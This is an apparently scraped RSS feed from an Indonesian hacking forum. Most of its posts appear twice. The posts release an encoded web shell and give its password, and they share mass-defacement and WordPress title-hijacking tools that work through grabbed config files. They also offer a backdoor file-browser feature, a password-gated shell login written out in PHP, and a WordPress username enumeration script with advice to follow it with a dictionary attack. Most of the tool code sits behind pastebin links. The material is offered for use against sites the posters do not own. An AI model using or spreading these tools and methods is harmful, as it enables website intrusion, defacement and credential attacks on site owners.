<![CDATA[BackBox Indonesia - PHP Development]]> https://www.backboxindonesia.or.id/ Thu, 30 Apr 2026 10:04:08 +0000 MyBB <![CDATA[Backbox Indonesia Web Shell v1.0 (Based on Indoxploit Shell)]]> https://www.backboxindonesia.or.id/thread-132.html Fri, 27 May 2016 10:08:06 +0000 https://www.backboxindonesia.or.id/thread-132.html Kali ini saya akan merelease Backbox Indonesia Webshell yang berbasis Shell Indoxploit
Fitur nya bisa anda cek sendiri, saya menambah beberapa tools dari shell inject serta membuat login shell dengan password hehe

Penampakan:

[Image: hiUCsVw.png][Image: jM7BUg1.png][Image: fvzZSv5.png]

Link: Download
PASSWORD SHELL: ilen12
Terima kasih saya ucapkan kepada Tim Indoxploit sekali lagi karena telah memberi izin untuk merecode shell ini, jika ada yang tidak senang dengan shell ini saya siap bertanggung jawab serta menghapus shell ini
NB: Maaf saya harus meng-encode shell ini, jika ada yg ingin source code nya silahkan PM saya di Disini]]> Kali ini saya akan merelease Backbox Indonesia Webshell yang berbasis Shell Indoxploit
Fitur nya bisa anda cek sendiri, saya menambah beberapa tools dari shell inject serta membuat login shell dengan password hehe

Penampakan:

[Image: hiUCsVw.png][Image: jM7BUg1.png][Image: fvzZSv5.png]

Link: Download
PASSWORD SHELL: ilen12
Terima kasih saya ucapkan kepada Tim Indoxploit sekali lagi karena telah memberi izin untuk merecode shell ini, jika ada yang tidak senang dengan shell ini saya siap bertanggung jawab serta menghapus shell ini
NB: Maaf saya harus meng-encode shell ini, jika ada yg ingin source code nya silahkan PM saya di Disini]]> <![CDATA[Auto Deface Cms Wordpress melalui link Config]]> https://www.backboxindonesia.or.id/thread-105.html Thu, 14 Apr 2016 16:26:22 +0000 https://www.backboxindonesia.or.id/thread-105.html
jadi misalnya lu grabber configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:
[Image: aa.png]

[Image: bl.png]

kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:
https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare]]>
jadi misalnya lu grabber configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:
[Image: aa.png]

[Image: bl.png]

kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:
https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare]]> <![CDATA[Tool Mass Deface]]> https://www.backboxindonesia.or.id/thread-100.html Mon, 11 Apr 2016 04:50:11 +0000 https://www.backboxindonesia.or.id/thread-100.html selama ini mungkin kita cuma memakainya saja.
karena biasanya tool ini sudah tersedia di shell.

Sebenarnya script ini cukup simple.
tapi cukup bikin puyeng juga kalo belum dapet logikanya.

POC:
[Image: coeg.png]

Script:
http://pastebin.com/SA7uKgiQ


#KeepShare]]> selama ini mungkin kita cuma memakainya saja.
karena biasanya tool ini sudah tersedia di shell.

Sebenarnya script ini cukup simple.
tapi cukup bikin puyeng juga kalo belum dapet logikanya.

POC:
[Image: coeg.png]

Script:
http://pastebin.com/SA7uKgiQ


#KeepShare]]> <![CDATA[[PHP] Salah satu tool di backdoor (untuk melihat files dan folders di Dir)]]> https://www.backboxindonesia.or.id/thread-88.html Sat, 26 Mar 2016 09:03:34 +0000 https://www.backboxindonesia.or.id/thread-88.html kali ini ane pengen share salah satu fitur yg byk digunakan di backdoor.

kalo ente pernah liat /home/user/public_html/anu/
terus ente klik salah satunya abis itu muncul deh file dan folder dalam dir tersebut.
nah ane pengen share itu.

keliatannya sih sederhana.
tapi cukup bikin ane puyeng juga.
pertama ane kira gampang, ane coba buat ternyata lumayan sulit.

sebenarnya ada cara yang lebih mudah.
tapi ntah kenapa lebih enakan pake punya sendiri.
Mungkin bisa dicoba di localhost atau site yang udah ketanem shell.

ya seengkanya kita tau-lah cara kerjanya. ngk cuma make doang.

Script:
http://pastebin.com/fU9pGFWx

SS:
[Image: a.png]]]> kali ini ane pengen share salah satu fitur yg byk digunakan di backdoor.

kalo ente pernah liat /home/user/public_html/anu/
terus ente klik salah satunya abis itu muncul deh file dan folder dalam dir tersebut.
nah ane pengen share itu.

keliatannya sih sederhana.
tapi cukup bikin ane puyeng juga.
pertama ane kira gampang, ane coba buat ternyata lumayan sulit.

sebenarnya ada cara yang lebih mudah.
tapi ntah kenapa lebih enakan pake punya sendiri.
Mungkin bisa dicoba di localhost atau site yang udah ketanem shell.

ya seengkanya kita tau-lah cara kerjanya. ngk cuma make doang.

Script:
http://pastebin.com/fU9pGFWx

SS:
[Image: a.png]]]> <![CDATA[Membuat password enc sendiri]]> https://www.backboxindonesia.or.id/thread-56.html Sun, 13 Mar 2016 09:58:13 +0000 https://www.backboxindonesia.or.id/thread-56.html
PHP Code:
<?php
error_reporting();
session_start();

$password "ec:550dfdef89bed03f550dfdef89bed03f"// 123

function login($key,$password){
$jum_key strlen($key);
$enc md5($key);
$jum_key substr(md5($jum_key),0,2);
$enc_1 substr($enc18);
$enc_2 substr($enc0,17);
$hasil "$jum_key:".substr(md5($enc_1),0,16).substr(md5($enc_1),0,16);
if($hasil==$password){
return true;
}else{
return false;
}
}

if($_POST['Passalt7']){
$cek login($_POST['password'],$password);
if($cek){
$_SESSION["login"]=$_POST['password'];
header('Location: ?');
}else{
echo "gagal";
}
}

if(!isset($_SESSION["login"])){
?>
<!DOCTYPE html>
<html>
<head>
<title>Login Page</title>
</head>
<body>
<form action="" method="post">
<input type="text" name="password">
<input type="submit" name="Passalt7">
</form>
</body>
</html>
<?php
}else{
echo "HALOOO";
}
?>
di atas adalah salah satu password enc modifan yang di ambil dari enc md5 dan biasa di kreasikan lagi sesuai dengan suasana hati.]]>
PHP Code:
<?php
error_reporting();
session_start();

$password "ec:550dfdef89bed03f550dfdef89bed03f"// 123

function login($key,$password){
$jum_key strlen($key);
$enc md5($key);
$jum_key substr(md5($jum_key),0,2);
$enc_1 substr($enc18);
$enc_2 substr($enc0,17);
$hasil "$jum_key:".substr(md5($enc_1),0,16).substr(md5($enc_1),0,16);
if($hasil==$password){
return true;
}else{
return false;
}
}

if($_POST['Passalt7']){
$cek login($_POST['password'],$password);
if($cek){
$_SESSION["login"]=$_POST['password'];
header('Location: ?');
}else{
echo "gagal";
}
}

if(!isset($_SESSION["login"])){
?>
<!DOCTYPE html>
<html>
<head>
<title>Login Page</title>
</head>
<body>
<form action="" method="post">
<input type="text" name="password">
<input type="submit" name="Passalt7">
</form>
</body>
</html>
<?php
}else{
echo "HALOOO";
}
?>
di atas adalah salah satu password enc modifan yang di ambil dari enc md5 dan biasa di kreasikan lagi sesuai dengan suasana hati.]]> <![CDATA[cara mengetahui username pada wordpress]]> https://www.backboxindonesia.or.id/thread-55.html Sun, 13 Mar 2016 09:18:54 +0000 https://www.backboxindonesia.or.id/thread-55.html
kali ini ane pengen share cara mengetahui username pada wordpress.
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.

cukup simple sih.
pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.

POC:

[Image: author.png]

jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.


Quote:script:
http://pastebin.com/AqCmhr2Y
]]>
kali ini ane pengen share cara mengetahui username pada wordpress.
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.

cukup simple sih.
pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.

POC:

[Image: author.png]

jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.


Quote:script:
http://pastebin.com/AqCmhr2Y
]]>